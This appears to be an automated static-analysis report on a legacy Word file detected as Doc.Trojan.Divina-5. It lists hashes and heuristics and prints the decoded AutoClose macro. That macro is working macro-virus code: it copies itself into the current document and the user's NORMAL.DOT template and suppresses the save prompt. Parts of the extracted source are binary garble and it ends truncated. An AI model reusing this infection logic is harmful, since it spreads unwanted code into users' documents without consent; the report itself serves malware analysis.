Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 67fc396de8bce0dd…

MALICIOUS

Office (OLE)

34.0 KB Created: 1998-01-01 00:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a4568189836dac4e7b28da45226ea980 SHA-1: 394cf6a76c39ef6f244bff2ce00465f0b1067598 SHA-256: 67fc396de8bce0ddec09271c015607e8e58963a23382f7565b352ae0b5cb254a
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word document containing a WordBasic AutoClose macro. This macro is designed to execute automatically when the document is closed, indicating a malicious intent to run arbitrary code. The ClamAV detection 'Doc.Trojan.Divina-5' further supports the malicious nature of the file.

Heuristics 4

  • ClamAV: Doc.Trojan.Divina-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Divina-5
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4245 bytes
SHA-256: 1504ce9c1b404fd4016df65f56d254142abf826f11d77099419ca605b20559ec
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"


Public Sub MAIN()

    Infezione

    WordBasic.Call "Effetti"

End Sub



Private Sub Infezione()
Dim fileattuale$
Dim dataeoraatt$
Dim dataeorasalv$
Dim dlg As Object
Dim macrodot$
Dim normaldot$
Dim trovata$
Dim NumeroMacro
Dim i
Dim macro$
Dim libcopia1$
Dim timer_

'** Salva come modello
'** Non rileva di essere in rete


'* memorizza in fileattuale il nome del doc aperto
'* continua se il doc è nuovo e non ha ancora un nome
    fileattuale$ = ""
    On Error Resume Next
    fileattuale$ = WordBasic.[FileName$]()

'* calcola data e ora e minuto dell ultimo salvataggio
    dataeoraatt$ = WordBasic.[Date$]() + " " + WordBasic.[Time$]()
    dataeorasalv$ = ""
    If fileattuale$ <> "" Then
        WordBasic.FileSummaryInfo FileName:=fileattuale$
            Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
            WordBasic.CurValues.FileSummaryInfo dlg
        dataeorasalv$ = dlg.LastSavedDate
    End If

'* se il minuto dell ultimo salvataggio è quello attuale
'* allora termina per non entrare in loop
'* termina anche se il documento è nuovo e non ancora salvato
'* o se è un file senza datasalvataggio, tipo un txt (che non sovrascrive)
    If dataeorasalv$ = dataeoraatt$ Or dataeorasalv$ = "" Then GoTo fine

'* trova dove è la macro
    macrodot$ = WordBasic.[MacroFileName$]("AutoClose")

'* trova path e disabilita la richiesta di salvataggio di normal
    normaldot$ = UCase(WordBasic.[DefaultDir$](2) + "\NORMAL.DOT")
    WordBasic.ToolsOptionsSave GlobalDotPrompt:=0

'* controlla se ci è già una autoclose in normal
    trovata$ = "false"
    NumeroMacro = WordBasic.CountMacros()
    For i = 1 To NumeroMacro
        macro$ = WordBasic.[MacroName$](i, 0)
        If macro$ = "AutoClose" Then trovata$ = "true"
    Next i

'* copia la macro in fileattuale, salvandolo come modello, o in normal
'* va effettuata una sola copia o si ha errore (vedi: libcopia$="true")
    libcopia1$ = "false"
    If fileattuale$ <> "" And fileattuale$ <> normaldot$ And fileattuale$ <> macrodot$ Then
        WordBasic.FileSaveAs Format:=1
        WordBasic.Organizer Copy:=1, Source:=macrodot$, Destination:=fileattuale$, Name:="AutoClose", Tab:=3
        libcopia1$ = "true"
    End If
    If fileattuale$ <> "" And fileattuale$ <> normaldot$ And fileattuale$ = macrodot$ And libcopia1$ = "false" And trovata$ = "false" Then WordBasic.Organizer Copy:=1, Source:=fileattuale$, Destination:=normaldot$, Name:="AutoClose", Tab:=3

'*
' non implementato perchè sovrascrive una altra AutoClose in filedot
' ogni tanto copia la macro in un altro modello
'   min = Minute(Now())
'   filedot$ = ""
'   If min = 30 Or min = 45 Then filedot$ = Files$(DefaultDir$(2) + "\*.DOT")
'   If fil
6å‘4|  Èr Øp
 WordBasic.ToolsGetSpelling    (          + <> WordBasic.ToolsGetSpelling( WordBasic.ToolsGetSpelling(                <> WordBasic.ToolsGetSpelling(    +    +  (Close         , Unrecognized_Argument43242 Mod <> WordBasic.ToolsGetSpelling( WordBasic.ToolsGetSpelling(   WordBasic.ToolsGetSpelling( WordBasic.Unrecognized_Statement29681 Then        WordBasic.ToolsGetSpelling    <>     Lib            Mod <> WordBasic.ToolsGetSpelling(    + * On   + End Goto   WordBasic.ToolsGetSpelling(      <>      WordBasic.PrintStatusBar  ))))))))))
 6˜‹�Þæ© æz•
    'Next x
    WordBasic.Beep
WordBasic.MsgBox "Questo computer non è ben protetto contro i virus ..." + Chr(10) + "A presto !", "", 48

    WordBasic.ToggleFull
salvataggioRob:
    Err.Number = 0
    On Error GoTo -1: On Error GoTo salvataggioRob
    WordBasic.FileSaveAll 0

    For x = 1 To 2
        For timer_ = 1 To (1000 * x)
        Next timer_
    Next x
    WordBasic.Beep
riprendi:
    Err.Number = 0
    On Err
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.